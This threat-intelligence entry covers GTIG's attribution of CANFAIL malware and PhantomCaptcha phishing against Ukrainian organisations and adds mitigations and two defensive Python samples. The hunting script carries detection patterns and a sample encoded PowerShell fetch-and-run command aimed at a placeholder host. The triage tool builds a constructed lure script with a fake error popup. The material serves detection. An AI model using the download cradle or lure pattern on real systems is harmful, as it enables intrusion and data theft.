Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs
A previously undocumented threat actor has been attributed to attacks targeting Ukrainian organizations with malware known as CANFAIL. Google Threat Intelligence Group (GTIG) described the hacking group as possibly affiliated with Russian intelligence services. The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and
AI Analysis
Technical Summary
Google Threat Intelligence Group (GTIG) has attributed a series of malware attacks to a previously undocumented threat actor suspected of being affiliated with Russian intelligence services. The actor targets Ukrainian organizations primarily in the defense, military, government, and energy sectors, and has expanded its interest to aerospace, manufacturing with military and drone ties, nuclear and chemical research, and international humanitarian organizations involved in the Ukraine conflict.

The malware, CANFAIL, is an obfuscated JavaScript payload that executes a PowerShell script, which in turn downloads and runs a memory-only PowerShell dropper. Because the second stage never touches disk, the on-disk forensic footprint is limited to the initial JavaScript and whatever PowerShell logging the host has enabled. A fake error message is shown to the victim to mask the infection.

The actor also runs credential-phishing campaigns that impersonate legitimate Ukrainian and Romanian energy companies to gain access to organizational and personal email accounts. Target lists are built from regional and industry research, and the actor uses large language models (LLMs) to improve reconnaissance, social engineering lure creation, and technical post-compromise work, including command-and-control infrastructure setup.

The group is further linked to the PhantomCaptcha campaign, in which phishing emails direct victims to fake pages whose instructions get the user to trigger the infection themselves, delivering WebSocket-based trojans. That campaign targeted organizations involved in Ukraine's war relief efforts.

GTIG assesses the actor as less sophisticated than other Russian groups, but its use of AI tools and tailored social engineering increases its operational effectiveness. The activity is phishing-delivered malware and credential theft rather than exploitation of a software vulnerability, so there is no patch to apply; defense rests on email controls, endpoint detection, and identity hardening. The focus on critical infrastructure and sensitive sectors indicates strategic espionage and disruption intent.
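The execution chain described above (a script host running obfuscated JavaScript, which launches PowerShell, which pulls a second stage into memory) leaves a recognisable process and script-block trail even when nothing is written to disk. The following Python is an added example, not code from the article or from GTIG: it runs a few hunting rules over constructed, Sysmon-style process-creation records and PowerShell script-block (Event ID 4104) text. The hostnames, paths and command lines are invented for the demonstration and use generic download-cradle patterns; they are not CANFAIL's actual commands, which the page does not publish.

```python
import base64
import re

# Rules for the chain on this page: script host -> PowerShell -> in-memory stage.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN_RE = re.compile(r"-w(?:in|indow|indowstyle)?\s+hidden", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download or decode of a payload ...
CRADLE_RE = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|\bcurl\b|FromBase64String", re.I)
# ... combined with an in-memory invocation.
INVOKE_RE = re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(ev):
    """Return the list of rule names an event trips (empty list means nothing suspicious)."""
    reasons = []
    if ev["type"] == "process":
        text = ev["cmdline"]
        if _basename(ev["image"]) in POWERSHELL and _basename(ev["parent"]) in SCRIPT_HOSTS:
            reasons.append("script-host-spawned-powershell")
        if HIDDEN_RE.search(text):
            reasons.append("hidden-window")
        decoded = decode_encoded_command(text)
        if decoded is not None:
            reasons.append("encoded-command")
            text = text + " " + decoded  # inspect the decoded payload as well
    else:  # script block text from PowerShell script block logging
        text = ev["text"]
    if CRADLE_RE.search(text) and INVOKE_RE.search(text):
        reasons.append("in-memory-download-cradle")
    return reasons


def hunt(events):
    findings = []
    for ev in events:
        reasons = analyse_event(ev)
        if reasons:
            findings.append({"host": ev["host"], "type": ev["type"], "reasons": reasons})
    return findings


def _encode_for_powershell(script):
    """PowerShell -EncodedCommand takes base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed telemetry: hostnames, paths and commands are invented, and the
# cradle is a generic pattern, not CANFAIL's real code.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')")},
    {"type": "scriptblock", "host": "ws01",
     "text": "$b=[Convert]::FromBase64String($d); IEX([Text.Encoding]::UTF8.GetString($b))"},
    {"type": "process", "host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The encoded-command rule matters in practice: without decoding the base64 argument the cradle keywords are invisible in the process-creation event, and the scheduled inventory script on ws02 shows why the rules are combined rather than alerting on any PowerShell launch.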
Potential Impact
European organizations, especially those with ties to Ukraine or operating in critical infrastructure sectors such as energy, defense, aerospace, manufacturing with military applications, nuclear and chemical research, and humanitarian aid, face significant risks from this threat. Compromise of email accounts can lead to credential theft, lateral movement, espionage, and disruption of operations. The use of memory-only droppers complicates detection and forensic analysis, increasing dwell time and potential damage. The phishing campaigns leveraging regional and industry-specific lures increase the likelihood of successful compromise. Additionally, the threat actor's use of AI-enhanced reconnaissance and social engineering could enable more precise and effective attacks against European entities supporting Ukraine or involved in related sectors. Neighboring countries like Romania and Moldova have already been targeted for reconnaissance and phishing, indicating a broader regional threat. The potential impact includes loss of sensitive information, operational disruption, and undermining of critical infrastructure resilience, which could have cascading effects on European security and stability.
Mitigation Recommendations
European organizations should implement targeted defenses beyond generic phishing awareness. Email filtering should detect obfuscated JavaScript and suspicious archive attachments, especially archive members with double extensions such as *.pdf.js, where a document extension disguises a script-host file type. Multi-factor authentication (MFA) on all email and critical systems is essential to limit the value of stolen credentials; because the actor relies on credential-phishing pages, phishing-resistant methods (FIDO2/WebAuthn) are preferable to one-time codes, which a fake login page can relay. Endpoint telemetry, not network monitoring alone, is needed to see the memory-only stage: enable PowerShell script block and module logging and process-creation auditing, and tune endpoint detection and response (EDR) behavioral analytics for living-off-the-land (LotL) patterns such as a script host (wscript.exe or cscript.exe) spawning PowerShell with hidden-window or encoded-command arguments. Threat hunting should look for indicators of CANFAIL and PhantomCaptcha activity, including suspicious Google Drive links and unexpected WebSocket connections from user workstations. Sharing threat intelligence with national cybersecurity centers and industry peers will improve detection and response capabilities. Given the actor's use of LLMs, training programs should cover AI-enhanced social engineering, where lures are fluent and well researched rather than visibly clumsy. Finally, organizations should review and harden their incident response plans so that stealthy, memory-resident malware and credential compromise can be contained and remediated quickly, including forced password resets and session revocation for affected accounts.
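Attachment triage for the archive-with-double-extension pattern named above, as an added example that is not from the article or the vendor: it opens a ZIP in memory, flags members whose final extension is a Windows script-host type hidden behind a document extension, and checks their content for markers typical of obfuscated JScript droppers (a WScript.Shell object, a PowerShell launch, hex-escaped strings, a fake error popup). The archive and its lure script are constructed here for the demonstration and are not CANFAIL samples; the marker list is generic and not a CANFAIL signature.

```python
import io
import re
import zipfile

# Windows script-host / loader extensions a mail gateway should never pass
# unchallenged, and the document extensions used to disguise them.
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "ps1", "cmd", "bat", "scr", "lnk"}
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}

# Content markers typical of obfuscated JScript droppers (generic, not CANFAIL signatures).
OBFUSCATION_MARKERS = [
    (re.compile(r"WScript\.Shell", re.I), "wscript-shell"),
    (re.compile(r"powershell", re.I), "powershell-launch"),
    (re.compile(r"String\.fromCharCode|unescape\s*\(|\beval\s*\(", re.I), "dynamic-eval"),
    (re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I), "hex-escaped-string"),
    (re.compile(r"\.Popup\s*\(|WScript\.Echo|MsgBox", re.I), "fake-error-popup"),
]


def classify_name(member_name):
    """'double-extension-script', 'script-attachment', or None for non-script members."""
    parts = member_name.rsplit("/", 1)[-1].lower().split(".")
    if len(parts) < 2 or parts[-1] not in SCRIPT_EXTS:
        return None
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
        return "double-extension-script"
    return "script-attachment"


def inspect_script(text):
    return [label for rx, label in OBFUSCATION_MARKERS if rx.search(text)]


def triage_archive(zip_bytes):
    """Return one finding per script-type member of the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            kind = classify_name(info.filename)
            if kind is None:
                continue
            # Cap what is scanned so a large or binary member cannot stall the gateway.
            text = zf.read(info)[:65536].decode("utf-8", errors="replace")
            findings.append({"name": info.filename, "kind": kind, "markers": inspect_script(text)})
    return findings


def should_quarantine(findings):
    return any(f["kind"] == "double-extension-script" or f["markers"] for f in findings)


def build_sample_archive():
    """Constructed lure archive for the demo; the script is harmless and not real malware."""
    lure_js = (
        "// constructed lure for the demo, not CANFAIL's code\n"
        "var sh = new ActiveXObject('WScript.Shell');\n"
        "var e = '\\x43\\x61\\x6e\\x6e\\x6f\\x74\\x20\\x6f\\x70\\x65\\x6e';\n"
        "sh.Popup('Error: the document is corrupted', 0, 'Adobe Reader', 16);\n"
        "sh.Run('powershell.exe -w hidden -nop -c Get-Date', 0, false);\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_2026.pdf.js", lure_js)
        zf.writestr("readme.txt", "nothing to see here")
        zf.writestr("tools/helper.js", "console.log('hello');")
    return buf.getvalue()


if __name__ == "__main__":
    results = triage_archive(build_sample_archive())
    for finding in results:
        print(finding)
    print("quarantine:", should_quarantine(results))
```

The name check alone is enough to quarantine the double-extension member; the content markers are there so a plain script attachment with dropper-like content is also caught, and so an analyst gets a reason string rather than a bare verdict.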
Affected Countries
Ukraine, Romania, Moldova, Poland, Germany, France, United Kingdom
Technical Details
- Article source: https://thehackernews.com/2026/02/google-ties-suspected-russian-actor-to.html (fetched 2026-02-13T17:33:19Z, 924 words)
Threat ID: 698f605fc9e1ff5ad84f914a
Added to database: 2/13/2026, 5:33:19 PM
Last enriched: 2/13/2026, 5:33:37 PM
Last updated: 2/21/2026, 12:17:36 AM